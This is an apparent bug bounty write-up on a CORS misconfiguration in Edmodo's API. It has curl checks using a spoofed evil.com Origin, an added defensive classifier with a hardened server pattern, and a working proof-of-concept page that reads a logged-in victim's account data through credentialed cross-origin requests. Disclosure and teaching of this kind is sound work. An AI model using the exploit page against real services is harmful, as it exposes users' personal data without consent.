Exploitation of CORS (Cross-Origin Resource Sharing) on Edmodo

Hello All,

This is Yeasir Arafat here. While I was pentesting Edmodo I noticed an API endpoint that looked vulnerable to a CORS misconfiguration. The first step is to confirm whether it really is vulnerable to CORS or not, and for that we need curl installed on the PC.

Here is the curl command (the -i flag prints the response headers, which is what we need to read):
curl -i https://www.edmodo.com -H "Origin: https://evil.com"
200 OK,
but no Access-Control-Allow-Credentials: true header.

Without that header a browser will not expose a credentialed (cookie-bearing) response to another origin, so www.edmodo.com on its own does not give an attacker the logged-in user's data.

Now the same check against api.edmodo.com:
curl -i https://api.edmodo.com -H "Origin: https://evil.com"
200 OK,
and this time the response carries Access-Control-Allow-Credentials: true.

The credentials header matters when Access-Control-Allow-Origin echoes the attacker-supplied origin as well: the two together let a script on https://evil.com read the logged-in user's response. That means api.edmodo.com is vulnerable to CORS misconfiguration. See the image below.
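The judgement made by eye in the two curl checks above, written out as code. This is an added example and not code from the original writeup: classifyCors() takes the Origin that was sent and the response headers that came back and says whether a page on that origin could read the response in a browser, and whether it could do so with the victim's cookies. parseHeaderBlock() turns the header block of `curl -i` output into the map it expects. For contrast, vulnerableCorsHeaders() is the server pattern that produces the api.edmodo.com result (echo any Origin, grant credentials) and hardenedCorsHeaders() is the fix. The sample responses, the function names and the ALLOWED_ORIGINS value are constructed for illustration and are not captures from Edmodo.

```javascript
// Added example, not from the original writeup.
// Result labels:
//   'blocked'        - no usable Access-Control-Allow-Origin grant for this origin
//   'anonymous-only' - a cross-origin page can read the response, but not with cookies
//   'credentialed'   - readable with the victim's session cookies (the api.edmodo.com case)
function classifyCors(origin, headers) {
  // Header names are case-insensitive; normalise before looking them up.
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v).trim();
  const acao = h['access-control-allow-origin'];
  const acac = (h['access-control-allow-credentials'] || '').toLowerCase() === 'true';
  if (acao === undefined) return 'blocked';
  // Browsers refuse "*" on a credentialed request whatever ACAC says, so the
  // wildcard only ever exposes responses fetched without cookies.
  if (acao === '*') return 'anonymous-only';
  // A grant for some other origin is useless. An echoed "null" origin does
  // count as a match: a sandboxed iframe sends "Origin: null".
  if (acao !== origin) return 'blocked';
  return acac ? 'credentialed' : 'anonymous-only';
}

// Parse the header block printed by `curl -i` into { name: value } (names lower-cased).
function parseHeaderBlock(text) {
  const headers = {};
  for (const line of text.split(/\r?\n/)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return headers;
}

// Server side. The vulnerable pattern echoes whatever Origin arrives and grants
// credentials, so any site can read a logged-in user's API responses.
function vulnerableCorsHeaders(origin) {
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened pattern: exact-match allowlist (no regexes, no prefix matches), and
// Vary: Origin so a shared cache cannot replay one origin's grant to another.
// ALLOWED_ORIGINS is an assumed value for this example.
const ALLOWED_ORIGINS = new Set(['https://www.edmodo.com']);

function hardenedCorsHeaders(origin) {
  if (!ALLOWED_ORIGINS.has(origin)) return {}; // no CORS headers at all: the browser blocks the read
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Constructed sample responses (not real captures), in the shape curl -i prints them.
// The first echoes the origin but omits the credentials header; the second is the
// combination found on the API host.
const SAMPLE_NO_CREDENTIALS = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html',
  'Access-Control-Allow-Origin: https://evil.com',
].join('\r\n');

const SAMPLE_ECHO_WITH_CREDENTIALS = [
  'HTTP/1.1 200 OK',
  'Content-Type: application/json',
  'Access-Control-Allow-Origin: https://evil.com',
  'Access-Control-Allow-Credentials: true',
].join('\r\n');

console.log(classifyCors('https://evil.com', parseHeaderBlock(SAMPLE_NO_CREDENTIALS)));
console.log(classifyCors('https://evil.com', parseHeaderBlock(SAMPLE_ECHO_WITH_CREDENTIALS)));
console.log(classifyCors('https://evil.com', hardenedCorsHeaders('https://evil.com')));
```

Run it with node; the three lines print anonymous-only, credentialed and blocked. When testing a target by hand, send a few different Origin values (an arbitrary domain, `null`, and a subdomain lookalike such as one that merely ends in the target's hostname) and feed each response through the same check, since a reflection that only triggers for some patterns is still exploitable.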

From that API endpoint I was able to read sensitive information: IP address, email, user ID, account creation date, the "about" text, and so on.

For exploitation I used the code below:

<!DOCTYPE html>
<title>CORS PoC Exploit</title>
<h1>CORS Exploit<br>Yeasir Arafat</h1>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script type="text/javascript">
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // The browser only hands us the body because api.edmodo.com echoes our
      // Origin and sends Access-Control-Allow-Credentials: true.
      document.getElementById("demo").innerHTML = this.responseText;
    }
  };
  xhttp.open("GET", "https://api.edmodo.com/users/id", true);
  // Send the victim's Edmodo session cookies along with the cross-origin request.
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>

I ran this exploit page in my browser and it pulled the user information from api.edmodo.com. The page can be served from localhost, any free domain, or anywhere else; to show you I simply ran it in my browser.

And now, if a logged-in user opens the page and hits the Exploit button, their account information is disclosed to me.

Thanks. Yeasir Arafat

Bangladeshi Bug Bounty Hunter